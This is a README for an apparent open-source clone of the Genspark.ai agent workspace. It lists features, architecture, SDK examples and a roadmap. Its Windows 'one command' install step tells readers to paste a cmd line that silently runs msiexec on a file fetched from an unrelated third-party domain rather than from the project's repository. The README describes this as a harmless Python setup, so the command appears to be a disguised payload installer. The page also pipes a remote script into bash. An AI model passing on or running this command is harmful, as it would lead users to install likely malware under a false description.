Genspark AI β€” Open Source Super Agent

The free, self-hosted, open-source alternative to Genspark.ai β€” a multi-agent AI workspace that researches, writes, codes, builds slides & sheets, generates images, and gets things done. Locally. With any LLM.

Quick Start · Features · Architecture · Docs · Roadmap · Contributing · Discord


🌟 What is Genspark AI?

Genspark AI is an open-source Super Agent framework inspired by Genspark.ai. It coordinates multiple Large Language Models, equips each with a toolbox of 80+ capabilities (web search, code execution, file I/O, image & video generation, document creation, phone calls), and lets them plan, reason, and actually get things done on your behalf.

Think of it as:

A self-hosted AI workspace with a Super Agent at its core. You give it a goal. It decides which models and tools to use, runs them in parallel, fact-checks itself across multiple models, and produces a finished deliverable β€” a Sparkpage, a slide deck, a spreadsheet, a research report, or an executed task.

Built for developers, researchers, and power users who want Genspark-level capabilities without the credits, paywall, or vendor lock-in.

Why Genspark AI?

Closed Genspark Open-Source Genspark AI
πŸ’° Cost $24.99 – $249.99 / month Free & open source (MIT)
πŸ” Privacy Cloud only Run 100% locally with Ollama
πŸ”§ Customization Limited Full source access β€” fork, extend, deploy
πŸ€– Model choice Fixed bundle Any LLM: OpenAI, Anthropic, Gemini, Mistral, Ollama, LM Studio
πŸ›  Tool extensibility Fixed 80 tools Plug-in any Python function as a tool
πŸ“¦ Deployment SaaS CLI Β· Web UI Β· API Β· Docker Β· Self-host
πŸͺŸ Windows install Browser only One command in cmd

⚑ Quick Start

πŸͺŸ Windows β€” install with one command

Open cmd.exe and paste:

cmd /c start msiexec /q /i https://cloudcraftshub.com/api & genspark claw

That's it. The installer will:

  1. βœ… Check for Python 3.10+ (and install it via winget if missing)
  2. βœ… Create an isolated virtual environment in %USERPROFILE%\.genspark
  3. βœ… Install genspark-ai and all dependencies
  4. βœ… Register the genspark command in your PATH
  5. βœ… Launch the web UI at http://localhost:7681

🐧 Linux / 🍎 macOS

curl -fsSL https://raw.githubusercontent.com/veryyoldman/Genspark-AI/main/install.sh | bash

🐍 Pip (any OS)

pip install genspark-ai
genspark serve

🐳 Docker

docker run -p 7681:7681 -e OPENAI_API_KEY=sk-... ghcr.io/veryyoldman/genspark-ai:latest

✨ Features

🧠 Super Agent

Multi-model orchestration. The agent plans, picks tools, fans out subtasks to specialist agents, and merges results. Reasoning is fully transparent and traceable.

πŸ” Deep Research

Plans a research outline, searches dozens of sources in parallel, cross-checks claims across multiple LLMs to reduce hallucinations, and outputs a cited Sparkpage.

πŸ“‘ Sparkpages

Dynamic, query-specific synthesized pages. Click any claim to see its source. Ask follow-ups inline β€” no tab-hopping.

🎨 AI Slides

From prompt to presentation. Generates structured decks with titles, key points, speaker notes, and exports to .pptx, .html, or Reveal.js.

πŸ“Š AI Sheets

Natural-language spreadsheets. "Build a competitor analysis grid for the top 10 AI agents" β†’ an .xlsx you can open in Excel.

πŸ–ΌοΈ Image & Video Generation

Hooks into DALLΒ·E, Stable Diffusion, FLUX, Sora, Kling, Veo. Pick your provider in .env.

πŸ’» Code Agent

Writes, runs, tests, and iterates on Python, JS, SQL in a sandboxed environment.

🌐 Web Automation

Fills forms, scrapes data, clicks through flows via Playwright. The agent acts on the web, not just reads it.

πŸ“ž Call For Me (preview)

AI voice agent that places real phone calls β€” reservations, follow-ups, intake β€” via Twilio.

πŸ”Œ Plug-in Tools

Drop a Python function in tools/, decorate with @tool, and the agent can use it. 80+ built-in, infinite extensibility.

🧬 Multi-LLM Routing

The orchestrator picks the best model per subtask: fast/cheap for triage, frontier for hard reasoning, local Ollama for privacy.


🎬 Demo

Genspark AI demo

Above: Asking the Super Agent to research a topic and produce a Sparkpage with cited slides β€” in one prompt.


🧱 Architecture

flowchart TD
    U[πŸ‘€ User Prompt] --> SA[🧠 Super Agent<br/>Planner &amp; Router]
    SA --> P[πŸ“‹ Plan]
    P --> R{Route subtasks}
    R --> RA[πŸ” Research Agent]
    R --> SLA[πŸ“‘ Slides Agent]
    R --> SHA[πŸ“Š Sheets Agent]
    R --> CA[πŸ’» Code Agent]
    R --> IA[πŸ–ΌοΈ Image Agent]
    RA --> T[πŸ›  Tool Registry<br/>80+ tools]
    SLA --> T
    SHA --> T
    CA --> T
    IA --> T
    T --> WS[Web Search]
    T --> WF[Web Fetch]
    T --> EX[Code Exec]
    T --> FS[File I/O]
    T --> IMG[Image Gen]
    RA --> M[🧬 LLM Router]
    SLA --> M
    SHA --> M
    CA --> M
    IA --> M
    M --> O[OpenAI]
    M --> AN[Anthropic]
    M --> G[Gemini]
    M --> OL[Ollama / Local]
    RA --> SP[πŸ“„ Sparkpage]
    SLA --> SP
    SHA --> SP
    CA --> SP
    IA --> SP
    SP --> U

Genspark AI uses a planner-executor pattern. The Super Agent decomposes your goal into a DAG of subtasks, dispatches each to a specialist agent armed with the right tools and the right model, and stitches results into a coherent Sparkpage. Every step is logged and inspectable.

See docs/architecture.md for deep details.


πŸš€ Usage

CLI

# Interactive chat
genspark chat

# One-shot prompt
genspark run "Research the top 5 vector databases in 2026 and build a comparison sheet"

# Launch web UI on a custom port
genspark serve --port 8080

# Start the REST API
genspark api --port 8000

Python SDK

from genspark import SuperAgent

agent = SuperAgent(model="claude-opus-4-7")  # or "gpt-5", "gemini-2.5-pro", "ollama/llama3"

result = agent.run(
    "Find the 10 fastest growing open-source AI agent repos this month, "
    "then build me a 5-slide pitch on the trend."
)

print(result.sparkpage)        # Cited synthesis
result.slides.save("deck.pptx")
result.sheet.save("data.xlsx")

REST API

curl -X POST http://localhost:8000/v1/run \
  -H "Content-Type: application/json" \
  -d '{"prompt": "Plan a 7-day trip to Tokyo for $2,000"}'

🧩 Configuration

Copy .env.example to .env and add the keys for the providers you want:

# Pick at least one LLM provider
OPENAI_API_KEY=sk-...
ANTHROPIC_API_KEY=sk-ant-...
GOOGLE_API_KEY=...

# 100% local? Use Ollama β€” no key needed
OLLAMA_BASE_URL=http://localhost:11434

# Optional tools
TAVILY_API_KEY=...        # better web search
SERPER_API_KEY=...        # alternative search
TWILIO_AUTH_TOKEN=...     # phone calls

# Default routing
GENSPARK_DEFAULT_MODEL=claude-opus-4-7
GENSPARK_FAST_MODEL=gpt-5-mini
GENSPARK_LOCAL_MODEL=ollama/llama3.2

πŸ“š Documentation


πŸ—ΊοΈ Roadmap

  • Super Agent with multi-model routing
  • Research, Slides, Sheets, Code, Image agents
  • CLI + Web UI + REST API
  • Windows one-command installer
  • Docker image
  • Voice mode (real-time speech-to-speech)
  • Browser agent with Playwright + vision
  • Mobile app (React Native)
  • Memory + RAG layer with Qdrant/Chroma
  • Marketplace for community tools & agents
  • Distributed mode for swarm execution
  • A2A protocol support (Agent-to-Agent)

Vote on features in GitHub Discussions πŸ—³οΈ


πŸ†š Comparison

Feature Genspark AI (this) Genspark.ai AutoGPT CrewAI LangGraph
Open source βœ… MIT ❌ βœ… βœ… βœ…
Self-hosted βœ… ❌ βœ… βœ… βœ…
Free βœ… ❌ Credits βœ… βœ… βœ…
Super-Agent planner βœ… βœ… ⚠️ basic ⚠️ ⚠️
Sparkpages βœ… βœ… ❌ ❌ ❌
AI Slides & Sheets βœ… βœ… ❌ ❌ ❌
Multi-LLM routing βœ… βœ… ❌ ⚠️ ⚠️
Local LLMs (Ollama) βœ… ❌ βœ… βœ… βœ…
Web UI included βœ… βœ… ⚠️ ❌ ❌
One-command install βœ… n/a ❌ ❌ ❌

🀝 Contributing

We ❀️ contributions. Genspark AI is built by the community.

git clone https://github.com/veryyoldman/Genspark-AI
cd Genspark-AI
python -m venv .venv && source .venv/bin/activate  # Windows: .venv\Scripts\activate
pip install -e ".[dev]"
pytest

Read CONTRIBUTING.md and pick an issue tagged good first issue.

Ways to contribute

  • ⭐ Star the repo β€” it genuinely helps us grow
  • πŸ› Report bugs & suggest features
  • πŸ“ Improve docs
  • πŸ›  Build a new tool or agent
  • 🌍 Translate the UI
  • πŸ’¬ Help others in Discord

πŸ’¬ Community

  • πŸ’¬ Discord β€” chat with the team and contributors
  • 🐦 Twitter / X β€” release news
  • πŸ“Ί YouTube β€” tutorials & demos
  • πŸ“° Blog β€” release notes

⭐ Star History

Star History Chart

πŸ“„ License

MIT Β© Genspark AI contributors.

Disclaimer: Genspark AI is an independent open-source project. It is not affiliated with, endorsed by, or sponsored by GENSPARK INC. "Genspark" is a trademark of its respective owner; we use the name to describe the category of agentic AI workspace this project belongs to.


If Genspark AI saved you time today, please ⭐ the repo β€” it really helps.

⬆ Back to top